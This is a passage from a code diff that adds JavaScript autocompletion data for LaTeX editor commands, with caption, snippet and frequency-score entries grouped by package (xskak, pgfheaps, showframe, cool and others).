0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xskak-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xskak-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'xskak-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'xskak-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'xskak-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'xskak-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'xskak-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'xskak-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'xskak-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'xskak-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'xskak-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xskak-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'xskak-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'xskak-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'xskak-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'xskak-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'xskak-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xskak-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'xskak-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xskak-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'xskak-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'xskak-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'xskak-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xskak-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'xskak-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'xskak-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'xskak-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'xskak-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'xskak-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'xskak-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'xskak-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'xskak-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'xskak-cmd', + score: 0.006520475264573554, + }, + ], + pgfheaps: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfheaps-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfheaps-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfheaps-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfheaps-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfheaps-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfheaps-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfheaps-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfheaps-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfheaps-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfheaps-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfheaps-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfheaps-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfheaps-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfheaps-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfheaps-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfheaps-cmd', + score: 0.2864294797053033, + }, + ], + pgfshade: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfshade-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfshade-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfshade-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfshade-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfshade-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfshade-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfshade-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfshade-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfshade-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfshade-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfshade-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfshade-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfshade-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfshade-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfshade-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfshade-cmd', + score: 0.2864294797053033, + }, + ], + showframe: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'showframe-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'showframe-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'showframe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'showframe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'showframe-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'showframe-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'showframe-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'showframe-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'showframe-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'showframe-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'showframe-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'showframe-cmd', + score: 0.0017658629469099734, + }, + ], + psvectorian: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psvectorian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'psvectorian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'psvectorian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'psvectorian-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'psvectorian-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'psvectorian-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'psvectorian-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'psvectorian-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'psvectorian-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psvectorian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'psvectorian-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'psvectorian-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'psvectorian-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'psvectorian-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'psvectorian-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'psvectorian-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'psvectorian-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'psvectorian-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'psvectorian-cmd', + score: 0.006520475264573554, + }, + ], + 'pst-grad': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-grad-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-grad-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-grad-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-grad-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-grad-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-grad-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-grad-cmd', + score: 0.006520475264573554, + }, + ], + cool: [ + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'cool-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'cool-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'cool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'cool-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'cool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'cool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'cool-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'cool-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'cool-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'cool-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'cool-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'cool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'cool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'cool-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'cool-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'cool-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'cool-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'cool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'cool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'cool-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'cool-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'cool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'cool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'cool-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'cool-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'cool-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'cool-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'cool-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'cool-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'cool-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'cool-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'cool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'cool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'cool-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'cool-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'cool-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'cool-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'cool-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'cool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'cool-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'cool-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'cool-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'cool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'cool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'cool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'cool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'cool-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'cool-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'cool-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'cool-cmd', + score: 3.164631070474435e-5, + }, + { + caption: 